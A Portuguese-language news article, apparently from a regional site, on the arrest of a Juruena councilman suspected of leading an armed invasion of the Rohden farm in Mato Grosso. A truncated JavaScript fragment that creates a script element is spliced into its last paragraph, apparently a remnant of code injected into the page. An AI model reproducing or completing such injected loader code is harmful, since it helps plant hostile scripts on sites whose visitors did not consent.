Capa / Em Destaque / Vereador é preso suspeito de liderar invasão a fazenda em município de MT

Vereador é preso suspeito de liderar invasão a fazenda em município de MT

neguinho13_juruena

Vereador “Neguinho da 13 de Maio”

O vereador de Juruena, município a 893 km de Cuiabá, Juracy Nascimento Santos (SD), conhecido como “Neguinho da 13 de Maio”, foi preso pela Polícia Civil no último domingo, 21, suspeito de liderar a invasão de uma fazenda na região. Ele é investigado pela polícia na “Operação Rohden”, batizada com o nome da fazenda invadida no início deste ano, que é propriedade da empresa Rohden Indústria Lignea.

O G1 tentou, mas não conseguiu localizar o advogado do parlamentar. No entanto, durante depoimento à polícia, o vereador negou o crime ou qualquer participação na invasão à fazenda Rohden. Conforme Juracy, ele compareceu ao local de invasão apenas como parlamentar, para tratar das questões sociais e ajudar as pessoas que se encontravam no local. O parlamentar é candidato à reeleição em Juruena.

Segundo o delegado, tanto o vereador quanto um segundo suspeito tiveram os mandados de prisão preventiva decretados pela Justiça, apontados como principais líderes da invasão.

A fazenda Rohden foi invadida por um grupo de aproximadamente 400 pessoas no dia 2 de abril deste ano. Os invasores, segundo os proprietários da terra, chegaram a derrubar árvores, queimar duas casas e dividir o terreno em lotes, que eram posteriormente vendidos a outras pessoas. A reintegração de posse da área chegou a ocorrer em 31 de maio, mas, em 23 de junho, os invasores voltaram a ocupar o terreno.

barracos1700A operação da polícia foi conduzida pelo delegado de Juína, Rodrigo Costa Rufato, e envolveu 60 policiais civis e militares. Conforme o delegado, o primeiro inquérito envolvendo a fazenda Rohden foi concluído há alguns dias com o indiciamento de cerca de 40 pessoas por associação criminosa armada, crimes contra o meio ambiente, esbulho possessório (invasão) e desobediência à ordem judicial – esse último porque a área foi desocupada e novamente invadida.

Conforme o delegado, além desses quatro crimes, o vereador também deve responder incitação a cometimento de crime. “No curso da investigação desse inquérito, apuramos que ele [vereador] foi o principal responsável por criar a situação e, assim como o suspeito que está foragido, um dos principais líderes da invasão. Há outros líderes, menos influentes, mas eles dois são os principais”, disse o delegado, em entrevista ao G1.

Ao todo, 12 buscas domiciliares foram cumpridas pela polícia na residência de 12 líderes identificados pela polícia, que teriam portado arma na fazenda invadida ou que manteriam armas em suas residências. “Essas buscas foram necessárias porque, inclusive, já chegou a ter troca de tiros na fazenda”, afirmou o delegado.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top